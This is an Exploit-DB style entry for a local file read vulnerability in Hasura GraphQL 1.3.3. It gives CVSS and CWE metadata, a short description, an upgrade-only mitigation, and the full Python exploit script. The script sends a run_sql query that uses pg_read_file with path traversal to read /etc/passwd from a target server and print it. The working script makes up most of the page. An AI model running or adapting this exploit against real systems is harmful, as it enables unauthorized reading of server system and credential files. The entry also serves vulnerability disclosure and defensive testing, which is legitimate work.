Hasura GraphQL 1.3.3 - Local File Read

vendor:

GraphQL Engine

by:

Dolev Farhi

8.8

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: GraphQL Engine

Affected Version From: 1.3.3

Affected Version To: 1.3.3

Patch Exists: YES

Related CWE: N/A

CPE: a:hasura:graphql-engine

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu

2021

Hasura GraphQL 1.3.3 – Local File Read

This exploit allows an attacker to read files from the server by exploiting a vulnerability in Hasura GraphQL 1.3.3. The exploit uses a SQL injection to read files from the server. The exploit is written in Python and uses the requests library to send a POST request to the Hasura GraphQL endpoint. The payload contains a SQL query that reads the file specified in the READ_FILE variable. The exploit then prints the contents of the file.

Mitigation:

Upgrade to the latest version of Hasura GraphQL and ensure that all security patches are applied.

Source

Exploit-DB raw data:

# Exploit Title: Hasura GraphQL 1.3.3 - Local File Read
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Exploit Author: Dolev Farhi
# Date: 4/19./2021
# Tested on: Ubuntu

import requests
import sys

HASURA_SCHEME = 'http'
HASURA_HOST = '192.168.1.1'
HASURA_PORT = 80
READ_FILE = '/etc/passwd'

def LFI(file):
    SQLI = "SELECT pg_read_file('../../../../../../../../../{}',0,1000);".format(file)
    data =  {"type":"bulk","args":[{"type":"run_sql","args":{"sql":SQLI,"cascade":False,"read_only":False}}]}
    endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
    r = requests.post(endpoint, json=data)
    return r.json()

res = LFI(READ_FILE)

try:
  print(res[0]['result'][1][0])
except:
  print(res)